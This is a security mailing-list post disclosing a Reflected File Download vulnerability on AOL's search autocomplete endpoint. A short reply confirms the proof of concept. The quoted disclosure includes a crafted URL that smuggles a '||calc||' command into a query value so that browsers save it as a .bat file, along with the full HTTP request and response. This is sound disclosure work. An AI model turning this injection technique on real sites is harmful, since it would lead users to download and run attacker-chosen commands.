PoC confirmed to work with Safari 8.0.3 on OSx 10.10.2 Good find! On 16/02/2015 16:15, "Ricardo Iramar dos Santos" <riramar@xxxxxxxxx> wrote: >Oren Hafif reported a new kind of attack called Reflected File >Download >(https://www.blackhat.com/eu-14/briefings.html#reflected-file-download-a-n >ew-web-attack-vector) >in Black Hat Europe 2014 conference. >More details about the attack you can found in his public >presentation: >https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-D >ownload-A-New-Web-Attack-Vector.pdf. >Google and Bing have already fixed the vulnerability but I've found >the same vulnerability in AOL Search Website. >A malicious user could send the link below to a victim that you >download a malicious batch file from autocomplete.search.aol.com >domain. >In the link below we have search for 'iramar "||calc||' using the AOL >autocomplete domain. The browser will encode the double quotes but the >server will escape it (\") and return inside the json on the body >response. >Since the response has the header "Content-Type: >application/x-suggestions+json;charset=UTF-8" the browser will >automatically try to download the reflected file. Chrome didn't try to >download the file but Internet Explorer and Firefox will. > >http://autocomplete.search.aol.com/autocomplete/get;calc.bat?q=iramar";||ca >lc||&it=ws-landing&dict=en_us_search&count=8&output=json > >REQUEST >GET >http://autocomplete.search.aol.com/autocomplete/get;calc.bat?q=iramar%22|| >calc||&it=ws-landing&dict=en_us_search&count=8&output=json >HTTP/1.1 >Host: autocomplete.search.aol.com >User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) >Gecko/20100101 Firefox/33.0 >Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 >Accept-Language: en-US,en;q=0.5 >Accept-Encoding: gzip, deflate >Cookie: ... >Connection: keep-alive > > >RESPONSE >HTTP/1.1 200 OK >Date: Tue, 21 Oct 2014 10:30:34 GMT >Server: Apache-Coyote/1.1 >Content-Type: application/x-suggestions+json;charset=UTF-8 >Content-Language: en-US >Content-Length: 24 >Keep-Alive: timeout=5, max=10 >Connection: Keep-Alive > >["iramar\"||calc||", []]
